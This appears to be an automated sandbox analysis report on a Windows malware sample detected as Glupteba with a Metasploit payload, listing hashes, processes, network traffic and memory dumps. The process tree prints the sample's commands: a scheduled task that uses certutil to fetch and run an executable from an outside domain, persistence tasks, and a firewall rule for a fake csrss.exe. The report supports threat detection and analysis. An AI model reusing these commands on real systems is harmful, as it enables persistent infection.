
Analysis

  • max time kernel: 5s
  • max time network: 165s
  • platform: windows7_x64
  • resource: win7-20231215-en
  • resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted: 31/12/2023, 03:26 UTC

General

  • Target: 2654d11f2d3ce974e432ad1c84bcd1f7.exe
  • Size: 4.5MB
  • MD5: 2654d11f2d3ce974e432ad1c84bcd1f7
  • SHA1: 053efdc46790dd1b49e93863df59c83c39342c8f
  • SHA256: df52242510b70aa54d66b0626624066ece6f8bd5384aa4897778bddfae321c51
  • SHA512: 8b577ed49b7648d67ac7ad19cefdad52eb3665d42561e7b97034607ab1d0e7eb2d0fa22a3338717a2c19e12b9826c338e0f66fcdef3cc9ad6d105c95a0b00df7
  • SSDEEP: 98304:UvcNtBvoJc7I0r0fy0hqQRi69numaD09pJ6N5f1qlFBdWiBl5E1oz2tiuD:UkJtjr0fXRi65rwfCFTZteoz2B

Malware Config

Extracted

  • Family: metasploit
  • Version: windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload (18 IoCs)
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Firewall (1 TTP, 1 IoC)
  • Creates scheduled task(s) (1 TTP, 2 IoCs)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent (2 IoCs)

    Uses default user-agent string defined by GoLang HTTP packages.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe (PID 1164)
    "C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"
    • C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe (PID 2848)
      "C:\Users\Admin\AppData\Local\Temp\2654d11f2d3ce974e432ad1c84bcd1f7.exe"
      • C:\Windows\system32\cmd.exe (PID 2580)
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      • C:\Windows\rss\csrss.exe (PID 2504)
        C:\Windows\rss\csrss.exe /51-51
        • C:\Windows\system32\schtasks.exe (PID 2792) [Creates scheduled task(s)]
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        • C:\Windows\system32\schtasks.exe (PID 368) [Creates scheduled task(s)]
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe (PID 2356)
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
  • C:\Windows\system32\makecab.exe (PID 2404)
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240102022855.log C:\Windows\Logs\CBS\CbsPersist_20240102022855.cab
  • C:\Windows\system32\netsh.exe (PID 2636) [Modifies Windows Firewall]
    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

Network

  • DNS [US] ninhaine.com (resolver 8.8.8.8:53)
    Request: ninhaine.com IN TXT
    Response: (empty)
  • DNS [US] 2makestorage.com (resolver 8.8.8.8:53)
    Request: 2makestorage.com IN TXT
    Response: (empty)
  • DNS [US] 2makestorage.com (resolver 8.8.8.8:53)
    Request: 2makestorage.com IN TXT
  • DNS [US] 2makestorage.com (resolver 8.8.8.8:53)
    Request: 2makestorage.com IN TXT
  • DNS [US] nisdably.com (resolver 8.8.8.8:53)
    Request: nisdably.com IN TXT
    Response: nisdably.com IN TXT ".v=spf1 include:_incspfcheck.mailspike.net ?all"
  • DNS [US] nisdably.com (resolver 8.8.8.8:53)
    Request: nisdably.com IN TXT
  • DNS [US] 7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com (resolver 8.8.8.8:53)
    Request: 7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com IN TXT
    Response: (empty)
  • DNS [US] server2.ninhaine.com (resolver 8.8.8.8:53)
    Request: server2.ninhaine.com IN A
    Response: server2.ninhaine.com IN A 46.8.8.100
  • DNS [US] server2.ninhaine.com (resolver 8.8.8.8:53)
    Request: server2.ninhaine.com IN A
  • DNS [US] apps.identrust.com (resolver 8.8.8.8:53)
    Request: apps.identrust.com IN A
    Response:
      apps.identrust.com IN CNAME identrust.edgesuite.net
      identrust.edgesuite.net IN CNAME a1952.dscq.akamai.net
      a1952.dscq.akamai.net IN A 96.17.179.184
      a1952.dscq.akamai.net IN A 96.17.179.205
  • DNS [US] apps.identrust.com (resolver 8.8.8.8:53)
    Request: apps.identrust.com IN A
  • DNS [US] apps.identrust.com (resolver 8.8.8.8:53)
    Request: apps.identrust.com IN A
    Response:
      apps.identrust.com IN CNAME identrust.edgesuite.net
      identrust.edgesuite.net IN CNAME a1952.dscq.akamai.net
      a1952.dscq.akamai.net IN A 96.17.179.184
      a1952.dscq.akamai.net IN A 96.17.179.205
  • DNS [US] apps.identrust.com (resolver 8.8.8.8:53)
    Request: apps.identrust.com IN A
  • DNS [US] apps.identrust.com (resolver 8.8.8.8:53)
    Request: apps.identrust.com IN A
  • DNS [US] msdl.microsoft.com (resolver 8.8.8.8:53)
    Request: msdl.microsoft.com IN A
    Response:
      msdl.microsoft.com IN CNAME msdl.microsoft.akadns.net
      msdl.microsoft.akadns.net IN CNAME msdl-microsoft-com.a-0016.a-msedge.net
      msdl-microsoft-com.a-0016.a-msedge.net IN CNAME a-0016.a-msedge.net
      a-0016.a-msedge.net IN A 204.79.197.219
  • GET [GB] http://apps.identrust.com/roots/dstrootcax3.p7c (remote 96.17.179.184:80)
    Request:
      GET /roots/dstrootcax3.p7c HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: apps.identrust.com
    Response:
      HTTP/1.1 200 OK
      X-XSS-Protection: 1; mode=block
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      X-Robots-Tag: noindex
      Referrer-Policy: same-origin
      Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
      ETag: "37d-6079b8c0929c0"
      Accept-Ranges: bytes
      Content-Length: 893
      X-Content-Type-Options: nosniff
      X-Frame-Options: sameorigin
      Content-Type: application/pkcs7-mime
      Cache-Control: max-age=3600
      Expires: Tue, 02 Jan 2024 03:29:47 GMT
      Date: Tue, 02 Jan 2024 02:29:47 GMT
      Connection: keep-alive
  • GET [GB] http://apps.identrust.com/roots/dstrootcax3.p7c (remote 96.17.179.184:80)
    Request:
      GET /roots/dstrootcax3.p7c HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: apps.identrust.com
    Response:
      HTTP/1.1 200 OK
      X-XSS-Protection: 1; mode=block
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      X-Robots-Tag: noindex
      Referrer-Policy: same-origin
      Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
      ETag: "37d-6079b8c0929c0"
      Accept-Ranges: bytes
      Content-Length: 893
      X-Content-Type-Options: nosniff
      X-Frame-Options: sameorigin
      Content-Type: application/pkcs7-mime
      Cache-Control: max-age=3600
      Expires: Tue, 02 Jan 2024 03:29:49 GMT
      Date: Tue, 02 Jan 2024 02:29:49 GMT
      Connection: keep-alive
  • DNS [US] www.microsoft.com (resolver 8.8.8.8:53)
    Request: www.microsoft.com IN A
    Response:
      www.microsoft.com IN CNAME www.microsoft.com-c-3.edgekey.net
      www.microsoft.com-c-3.edgekey.net IN CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net IN CNAME e13678.dscb.akamaiedge.net
      e13678.dscb.akamaiedge.net IN A 92.123.241.137
  • DNS [US] ww82.ninhaine.com (resolver 8.8.8.8:53)
    Request: ww82.ninhaine.com IN A
    Response:
      ww82.ninhaine.com IN CNAME 63214.bodis.com
      63214.bodis.com IN A 199.59.243.225
  • DNS [US] ww82.ninhaine.com (resolver 8.8.8.8:53)
    Request: ww82.ninhaine.com IN A
  • DNS [US] ww82.ninhaine.com (resolver 8.8.8.8:53)
    Request: ww82.ninhaine.com IN A
  • DNS [US] ww82.ninhaine.com (resolver 8.8.8.8:53)
    Request: ww82.ninhaine.com IN A
  • GET [US] http://ww82.ninhaine.com/ (remote 199.59.243.225:80)
    Request:
      GET / HTTP/1.1
      Host: ww82.ninhaine.com
      User-Agent: Go-http-client/1.1
      Content-Type: application/json; charset=UTF-8
      Accept-Encoding: gzip
    Response:
      HTTP/1.1 200 OK
      date: Tue, 02 Jan 2024 02:29:56 GMT
      content-type: text/html; charset=utf-8
      content-length: 1021
      x-request-id: ec1b3501-b497-4488-97f4-079e9a224a28
      cache-control: no-store, max-age=0
      accept-ch: sec-ch-prefers-color-scheme
      critical-ch: sec-ch-prefers-color-scheme
      vary: sec-ch-prefers-color-scheme
      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
      set-cookie: parking_session=ec1b3501-b497-4488-97f4-079e9a224a28; expires=Tue, 02 Jan 2024 02:44:56 GMT; path=/
  • GET [US] http://ww82.ninhaine.com/ (remote 199.59.243.225:80)
    Request:
      GET / HTTP/1.1
      Host: ww82.ninhaine.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
      Accept-Encoding: gzip
    Response:
      HTTP/1.1 200 OK
      date: Tue, 02 Jan 2024 02:29:56 GMT
      content-type: text/html; charset=utf-8
      content-length: 1021
      x-request-id: aea5f282-ebbf-4187-8753-3328666798f3
      cache-control: no-store, max-age=0
      accept-ch: sec-ch-prefers-color-scheme
      critical-ch: sec-ch-prefers-color-scheme
      vary: sec-ch-prefers-color-scheme
      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PWYaEjx1WLab74ULRf6Jk7/LR73s9JiUTVCBBaovLQ9NfKj4K53i5rfcUyBtNPKTbRb0vLBnSDmDHwZzWPyBTA==
      set-cookie: parking_session=aea5f282-ebbf-4187-8753-3328666798f3; expires=Tue, 02 Jan 2024 02:44:56 GMT; path=/
  • GET [US] http://ww82.ninhaine.com/ (remote 199.59.243.225:80)
    Request:
      GET / HTTP/1.1
      Host: ww82.ninhaine.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
      Accept-Encoding: gzip
    Response:
      HTTP/1.1 200 OK
      date: Tue, 02 Jan 2024 02:29:58 GMT
      content-type: text/html; charset=utf-8
      content-length: 1021
      x-request-id: 77140089-0927-465a-ac53-e3d498537c8d
      cache-control: no-store, max-age=0
      accept-ch: sec-ch-prefers-color-scheme
      critical-ch: sec-ch-prefers-color-scheme
      vary: sec-ch-prefers-color-scheme
      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TeqaaDzaGkh++CO3S2rcAD+HiwCyxodbqjX0AgEelFwPnTwWZi+A6QzfdPwL/iC6OYYBvcgXGbWB/P0ZEczIcQ==
      set-cookie: parking_session=77140089-0927-465a-ac53-e3d498537c8d; expires=Tue, 02 Jan 2024 02:44:58 GMT; path=/
  • GET [US] http://ww82.ninhaine.com/ (remote 199.59.243.225:80)
    Request:
      GET / HTTP/1.1
      Host: ww82.ninhaine.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Accept-Encoding: gzip
    Response:
      HTTP/1.1 200 OK
      date: Tue, 02 Jan 2024 02:29:59 GMT
      content-type: text/html; charset=utf-8
      content-length: 1021
      x-request-id: 8b263e78-fd1c-4205-8c2c-64046dd374fd
      cache-control: no-store, max-age=0
      accept-ch: sec-ch-prefers-color-scheme
      critical-ch: sec-ch-prefers-color-scheme
      vary: sec-ch-prefers-color-scheme
      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ppx9vxY7pmKhVFjR3+KyMhuE2D1SlyAf7U9Eg/jAKoTo2ogcFYqti0wYsjkE25HHFUyy7CruXr2Oi10jSAWC9g==
      set-cookie: parking_session=8b263e78-fd1c-4205-8c2c-64046dd374fd; expires=Tue, 02 Jan 2024 02:44:59 GMT; path=/
  • GET [US] http://ww82.ninhaine.com/ (remote 199.59.243.225:80)
    Request:
      GET / HTTP/1.1
      Host: ww82.ninhaine.com
      User-Agent: Go-http-client/1.1
      Content-Type: application/x-www-form-urlencoded
      Accept-Encoding: gzip
    Response:
      HTTP/1.1 200 OK
      date: Tue, 02 Jan 2024 02:30:01 GMT
      content-type: text/html; charset=utf-8
      content-length: 1021
      x-request-id: ed872d44-fa67-4b7a-a89f-e9e6d41e6dbe
      cache-control: no-store, max-age=0
      accept-ch: sec-ch-prefers-color-scheme
      critical-ch: sec-ch-prefers-color-scheme
      vary: sec-ch-prefers-color-scheme
      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Tt/J9oqHpuqXX6un3Cskdko3ntgD1EOja6YOeQ+8B1Hpbe2+JoOhWbyNcOz/GR92FxtaOj/IK4FrDZpNw9TExw==
      set-cookie: parking_session=ed872d44-fa67-4b7a-a89f-e9e6d41e6dbe; expires=Tue, 02 Jan 2024 02:45:01 GMT; path=/
  • DNS [US] vsblobprodscussu5shard30.blob.core.windows.net (resolver 8.8.8.8:53)
    Request: vsblobprodscussu5shard30.blob.core.windows.net IN A
    Response:
      vsblobprodscussu5shard30.blob.core.windows.net IN CNAME blob.sat09prdstrz08a.store.core.windows.net
      blob.sat09prdstrz08a.store.core.windows.net IN CNAME blob.SAT09PrdStrz08A.trafficmanager.net
      blob.SAT09PrdStrz08A.trafficmanager.net IN A 20.150.79.68
      blob.SAT09PrdStrz08A.trafficmanager.net IN A 20.150.70.36
      blob.SAT09PrdStrz08A.trafficmanager.net IN A 20.150.38.228
  Connection summary (per flow: destination, host, protocol, bytes sent / bytes received, packets sent / packets received):

  • 46.8.8.100:443 (server2.ninhaine.com) tls: 1.1kB / 5.1kB, packets 12 / 13
  • 46.8.8.100:443 (server2.ninhaine.com): 152 B sent, 3 packets
  • 46.8.8.100:443 (server2.ninhaine.com) tls: 1.9kB / 5.1kB, packets 13 / 14
  • 46.8.8.100:443 (server2.ninhaine.com) tls: 1.1kB / 4.9kB, packets 14 / 9
  • 204.79.197.219:443 (msdl.microsoft.com) tls: 1.9kB / 8.0kB, packets 15 / 16
  • 96.17.179.184:80 (http://apps.identrust.com/roots/dstrootcax3.p7c) http: 369 B / 1.6kB, packets 5 / 4
    HTTP request: GET http://apps.identrust.com/roots/dstrootcax3.p7c; response 200
  • 96.17.179.184:80 (http://apps.identrust.com/roots/dstrootcax3.p7c) http: 727 B / 1.6kB, packets 7 / 4
    HTTP request: GET http://apps.identrust.com/roots/dstrootcax3.p7c; response 200
  • 46.8.8.100:443 (server2.ninhaine.com) tls: 1.1kB / 5.0kB, packets 16 / 10
  • 46.8.8.100:443 (server2.ninhaine.com) tls: 1.3kB / 236 B, packets 10 / 5
  • 46.8.8.100:443 (server2.ninhaine.com) tls: 14.9kB / 8.7kB, packets 30 / 27
  • 46.8.8.100:443 (server2.ninhaine.com) tls: 836 B / 4.9kB, packets 10 / 10
  • 199.59.243.225:80 (http://ww82.ninhaine.com/) http: 565 B / 2.5kB, packets 9 / 7
    HTTP request: GET http://ww82.ninhaine.com/; response 200
  • 199.59.243.225:80 (http://ww82.ninhaine.com/) http: 1.5kB / 8.9kB, packets 16 / 17
    HTTP request: GET http://ww82.ninhaine.com/; response 200
    HTTP request: GET http://ww82.ninhaine.com/; response 200
    HTTP request: GET http://ww82.ninhaine.com/; response 200
    HTTP request: GET http://ww82.ninhaine.com/; response 200
  • 46.8.8.100:443 (server2.ninhaine.com) tls: 4.8kB / 6.2kB, packets 31 / 24
  • 20.150.79.68:443 (vsblobprodscussu5shard30.blob.core.windows.net) tls: 21.1kB / 989.7kB, packets 427 / 713
  • 8.8.8.8:53 (ninhaine.com) dns: 58 B / 58 B, packets 1 / 1
    DNS request: ninhaine.com
  • 8.8.8.8:53 (2makestorage.com) dns: 186 B / 135 B, packets 3 / 1
    DNS requests: 2makestorage.com (3 requests)
  • 8.8.8.8:53 (nisdably.com) dns: 116 B / 117 B, packets 2 / 1
    DNS requests: nisdably.com (2 requests)
  • 8.8.8.8:53 (7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com) dns: 95 B / 95 B, packets 1 / 1
    DNS request: 7d2dca12-1ec5-4f75-a6e6-8d54ea77236e.ninhaine.com
  • 8.8.8.8:53 (server2.ninhaine.com) dns: 132 B / 82 B, packets 2 / 1
    DNS requests: server2.ninhaine.com (2 requests)
    DNS response: 46.8.8.100
  • 8.8.8.8:53 (apps.identrust.com) dns: 128 B / 165 B, packets 2 / 1
    DNS requests: apps.identrust.com (2 requests)
    DNS response: 96.17.179.184, 96.17.179.205
  • 8.8.8.8:53 (apps.identrust.com) dns: 192 B / 165 B, packets 3 / 1
    DNS requests: apps.identrust.com (3 requests)
    DNS response: 96.17.179.184, 96.17.179.205
  • 8.8.8.8:53 (msdl.microsoft.com) dns: 64 B / 182 B, packets 1 / 1
    DNS request: msdl.microsoft.com
    DNS response: 204.79.197.219
  • 8.8.8.8:53 (www.microsoft.com) dns: 63 B / 230 B, packets 1 / 1
    DNS request: www.microsoft.com
    DNS response: 92.123.241.137
  • 8.8.8.8:53 (ww82.ninhaine.com) dns: 252 B / 105 B, packets 4 / 1
    DNS requests: ww82.ninhaine.com (4 requests)
    DNS response: 199.59.243.225
  • 8.8.8.8:53 (vsblobprodscussu5shard30.blob.core.windows.net) dns: 92 B / 231 B, packets 1 / 1
    DNS request: vsblobprodscussu5shard30.blob.core.windows.net
    DNS response: 20.150.79.68, 20.150.70.36, 20.150.38.228


Downloads

  • memory/1164-1-0x0000000000F20000-0x000000000135C000-memory.dmp (4.2MB)
  • memory/1164-2-0x0000000001360000-0x0000000001C86000-memory.dmp (9.1MB)
  • memory/1164-3-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/1164-0-0x0000000000F20000-0x000000000135C000-memory.dmp (4.2MB)
  • memory/1164-4-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/1164-6-0x0000000000F20000-0x000000000135C000-memory.dmp (4.2MB)
  • memory/1164-7-0x0000000001360000-0x0000000001C86000-memory.dmp (9.1MB)
  • memory/2356-45-0x0000000140000000-0x00000001405E8000-memory.dmp (5.9MB)
  • memory/2356-61-0x0000000140000000-0x00000001405E8000-memory.dmp (5.9MB)
  • memory/2504-246-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-34-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-20-0x0000000000F70000-0x00000000013AC000-memory.dmp (4.2MB)
  • memory/2504-329-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-328-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-22-0x0000000000F70000-0x00000000013AC000-memory.dmp (4.2MB)
  • memory/2504-24-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-25-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-26-0x0000000000F70000-0x00000000013AC000-memory.dmp (4.2MB)
  • memory/2504-27-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-33-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-327-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-42-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-326-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-325-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-324-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-322-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2504-323-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2848-5-0x0000000000F70000-0x00000000013AC000-memory.dmp (4.2MB)
  • memory/2848-8-0x0000000000F70000-0x00000000013AC000-memory.dmp (4.2MB)
  • memory/2848-9-0x00000000013B0000-0x0000000001CD6000-memory.dmp (9.1MB)
  • memory/2848-10-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2848-19-0x0000000000400000-0x0000000000D41000-memory.dmp (9.3MB)
  • memory/2848-21-0x0000000000F70000-0x00000000013AC000-memory.dmp (4.2MB)
